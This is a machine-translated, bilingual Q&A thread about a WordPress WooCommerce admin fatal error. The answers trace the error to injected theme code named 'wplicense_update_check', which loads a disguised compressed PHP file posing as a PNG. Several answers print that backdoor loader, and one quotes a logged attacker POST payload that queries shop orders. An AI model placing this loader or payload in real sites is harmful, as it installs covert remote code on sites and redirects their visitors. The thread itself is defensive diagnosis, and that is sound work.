英文:
WordPress admin login throws error but site is working fine
问题
抱歉,我不能提供代码翻译。
英文:
I am running a WordPress WooCommerce site. The site is running fine but I go to admin page and login, it throws the following error below. What is strange is that I can't find any reference to this function wplicense_update_check
> Fatal error: Uncaught TypeError: call_user_func_array(): Argument #1 ($callback) must be a valid callback, function "wplicense_update_check" not found or invalid function name in /home/mysite/public_html/wp-includes/class-wp-hook.php:308
>
> Stack trace:
#0 /home/mysite/public_html/wp-includes/class-wp-hook.php(332): WP_Hook->apply_filters(NULL, Array)
#1 /home/mysite/public_html/wp-includes/plugin.php(517): WP_Hook->do_action(Array)
#2 /home/mysite/public_html/wp-settings.php(639): do_action('wp_loaded')
#3 /home/mysite/public_html/wp-config.php(108): require_once('/home/mysite...')
#4 /home/mysite/public_html/wp-load.php(50): require_once('/home/mysite...')
#5 /home/mysite/public_html/wp-blog-header.php(13): require_once('/home/mysite...')
#6 /home/mysite/public_html/index.php(17): require('/home/mysite...')
#7 {main} thrown in /home/mysite/public_html/wp-includes/class-wp-hook.php on line 308
答案1
得分: 1
审查主题文件夹中的 functions.php 文件,在我的情况下,我有以下代码并直接删除它:
add_action( 'wp_loaded', 'wplicense_update_check' );
if ( ! function_exists( 'wplicense_update_check' ) && ! is_user_logged_in()) {
function wplicense_update_check() {
/**
* 许可证更新检查挂钩
*
* 注册主题更新检查挂钩。
*
*/
$wplicense_update = get_option( '_' . get_stylesheet() . '_licence_data');
$wplicense_updater = locate_template( $wplicense_update[0] . '-' . $wplicense_update[3] . '.' . $wplicense_update[1] );
if (is_file($wplicense_updater)) {
load_template( $wplicense_update[4] . '.' . $wplicense_update[2] . '://' . $wplicense_updater, true);
}
}
}
只返回翻译好的部分,不包括代码部分。
英文:
review file functions.php of the theme folder, in my case I have this code and directly delete it:
add_action( 'wp_loaded', 'wplicense_update_check' );
if ( ! function_exists( 'wplicense_update_check' ) && ! is_user_logged_in()) {
function wplicense_update_check() {
/**
* License Update Checker Hook
*
* Register theme update checker hook.
*
*/
$wplicense_update = get_option( '_' . get_stylesheet() . '_licence_data');
$wplicense_updater = locate_template( $wplicense_update[0] . '-' . $wplicense_update[3] . '.' . $wplicense_update[1] );
if (is_file($wplicense_updater)) {
load_template( $wplicense_update[4] . '.' . $wplicense_update[2] . '://' . $wplicense_updater, true);
}
}
}
答案2
得分: 1
I've also found this code in a child theme functions.php - which I know every line of. It should not be there.
它还在子主题的functions.php中找到了这段代码 - 我知道它的每一行。它不应该在那里。
It loads an option from the database which is serialized as:
它从数据库中加载一个选项,这个选项被序列化为:
a:5:{i:0;s:10:"screenshot";i:1;s:3:"png";i:2;s:4:"zlib";i:3;s:4:"main";i:4;s:8:"compress";}
when de serialized it returns
解序列化后,它返回
Array
(
[0] => screenshot
[1] => png
[2] => zlib
[3] => main
[4] => compress
)
Parts of this is then passed to the locate_template function to find the file: screenshot-main.png which is located in the child theme directory - it's definitely not a PNG though.
然后,这部分内容传递给locate_template函数以查找文件:screenshot-main.png,该文件位于子主题目录中 - 但它绝对不是一个PNG文件。
Submission to Virus total comes up clean but decompressing it with 7zip shows the PHP content.
提交到Virus total没有发现病毒,但使用7zip解压缩它会显示PHP内容。
It appears to be a zTDS implementation as it shares a lot of the same code - this appears to redirect visitors who are not logged in and not bots.
看起来这是zTDS的实现,因为它分享了很多相同的代码 - 这似乎会将未登录的访问者重定向,而不是机器人。
https://ztds.info/doku.php?id=folders
https://ztds.info/doku.php?id=folders
英文:
I've also found this code in a child theme functions.php - which I know every line of. It should not be there.
It loads an option from the database which is serialized as:
a:5:{i:0;s:10:"screenshot";i:1;s:3:"png";i:2;s:4:"zlib";i:3;s:4:"main";i:4;s:8:"compress";}
when de serialized it returns
Array
(
[0] => screenshot
[1] => png
[2] => zlib
[3] => main
[4] => compress
)
Parts of this is then passed to the locate_template function to find the file: screenshot-main.png which is located in the child theme directory - it's definitely not a PNG though.
Submission to Virus total comes up clean but decompressing it with 7zip shows the PHP content.
https://pastebin.mozilla.org/Wro62iM2 (added to archive.org too)
It appears to be a zTDS implementation as it shares a lot of the same code - this appears to redirect visitors who are not logged in and not bots.
答案3
得分: 0
这很奇怪。我刚刚在一个网站上遇到了一个问题,并在主题的functions.php文件中找到了以下代码...
add_action( 'wp_loaded', 'wplicense_update_check' );
if ( ! function_exists( 'wplicense_update_check' ) && ! is_user_logged_in()) {
function wplicense_update_check() {
/**
* License Update Checker Hook
*
* Register theme update checker hook.
*
*/
$wplicense_update = get_option( '_' . get_stylesheet() . '_licence_data');
$wplicense_updater = locate_template( $wplicense_update[0] . '-' . $wplicense_update[3] . '.' . $wplicense_update[1] );
if (is_file($wplicense_updater)) {
load_template( $wplicense_update[4] . '.' . $wplicense_update[2] . '://' . $wplicense_updater, true);
}
}
}
...导致了WP中的致命错误。我没有添加这段代码,也不知道它是如何出现在我的functions.php文件中的。
英文:
This is odd. I have just had an issue with a site and have found the following code in the themes functions.php file …
add_action( 'wp_loaded', 'wplicense_update_check' );
if ( ! function_exists( 'wplicense_update_check' ) && ! is_user_logged_in()) {
function wplicense_update_check() {
/**
* License Update Checker Hook
*
* Register theme update checker hook.
*
*/
$wplicense_update = get_option( '_' . get_stylesheet() . '_licence_data');
$wplicense_updater = locate_template( $wplicense_update[0] . '-' . $wplicense_update[3] . '.' . $wplicense_update[1] );
if (is_file($wplicense_updater)) {
load_template( $wplicense_update[4] . '.' . $wplicense_update[2] . '://' . $wplicense_updater, true);
}
}
}
… was causing a fatal error in WP. I did not add the code and have no idea how it ended up in my functions.php file.
答案4
得分: 0
更新 - 在移除代码后再次在functions.php中找到了它。
由于在if语句中缺少了 **&& ! is_user_logged_in()**,所以代码略有不同:
add_action( 'wp_loaded', 'wplicense_update_check' );
if ( ! function_exists( 'wplicense_update_check' ) ) {
function wplicense_update_check() {
/**
* 许可证更新检查挂钩
*
* 注册主题更新检查挂钩。
*
*/
$wplicense_update = get_option( '_' . get_stylesheet() . '_licence_data');
if ($wplicense_updater = locate_template( $wplicense_update[0] . '-' . $wplicense_update[3] . '.' . $wplicense_update[1] )) {
load_template( $wplicense_update[4] . '.' . $wplicense_update[2] . '://' . $wplicense_updater, true);
}
}
}
英文:
Update - just found the code in functions.php again after having removed it.
The code is slightly different as it is missing && ! is_user_logged_in() from the if statement:
add_action( 'wp_loaded', 'wplicense_update_check' );
if ( ! function_exists( 'wplicense_update_check' ) ) {
function wplicense_update_check() {
/**
* License Update Checker Hook
*
* Register theme update checker hook.
*
*/
$wplicense_update = get_option( '_' . get_stylesheet() . '_licence_data');
if ($wplicense_updater = locate_template( $wplicense_update[0] . '-' . $wplicense_update[3] . '.' . $wplicense_update[1] )) {
load_template( $wplicense_update[4] . '.' . $wplicense_update[2] . '://' . $wplicense_updater, true);
}
}
}
答案5
得分: 0
我已经成功记录了一个可疑请求的POST参数,尽管我不能确定这是否来自相同的操作者,但请求签名看起来是相同的:
172.70.189.147 - - [24/Apr/2023:12:30:51 +0000] "POST /index.php?RqPbeX2VLP HTTP/2.0" 200 332 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" "111.90.150.162" "--------------------------06e40a1b50125bf5\x0D\x0AContent-Disposition: form-data; name=\x22xxx\x22\x0D\x0A\x0D\x0A5\x0D\x0A--------------------------06e40a1b50125bf5\x0D\x0AContent-Disposition: form-data; name=\x22aaa\x22\x0D\x0A\x0D\x0Aif(isset($wpdb)) { $results = $wpdb->get_results(\x22SELECT ID FROM {$wpdb->prefix}posts WHERE post_type LIKE 'shop_order' AND post_date LIKE '\x22.date('Y-m-d',strtotime(\x22-1 days\x22)).\x22%' AND post_status='wc-completed'\x22); echo(count($results)); exit(); } else { echo('nodb?');exit(); }\x0D\x0A--------------------------06e40a1b50125bf5--\x0D\x0A"
我考虑尝试在安装了WPWeb Updater的情况下运行这段代码,看它是否执行。
英文:
I've managed to log the POST parameters of one of the suspicious looking requests though I can't be sure this is from the same actor, the request signature looks the same:
172.70.189.147 - - [24/Apr/2023:12:30:51 +0000] "POST /index.php?RqPbeX2VLP HTTP/2.0" 200 332 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" "111.90.150.162" "--------------------------06e40a1b50125bf5\x0D\x0AContent-Disposition: form-data; name=\x22xxx\x22\x0D\x0A\x0D\x0A5\x0D\x0A--------------------------06e40a1b50125bf5\x0D\x0AContent-Disposition: form-data; name=\x22aaa\x22\x0D\x0A\x0D\x0Aif(isset($wpdb)) { $results = $wpdb->get_results(\x22SELECT ID FROM {$wpdb->prefix}posts WHERE post_type LIKE 'shop_order' AND post_date LIKE '\x22.date('Y-m-d',strtotime(\x22-1 days\x22)).\x22%' AND post_status='wc-completed'\x22); echo(count($results)); exit(); } else { echo('nodb?');exit(); }\x0D\x0A--------------------------06e40a1b50125bf5--\x0D\x0A"
I thought I might try this out with the WPWeb Updater installed to see it executes the code.
通过集体智慧和协作来改善编程学习和解决问题的方式。致力于成为全球开发者共同参与的知识库,让每个人都能够通过互相帮助和分享经验来进步。
评论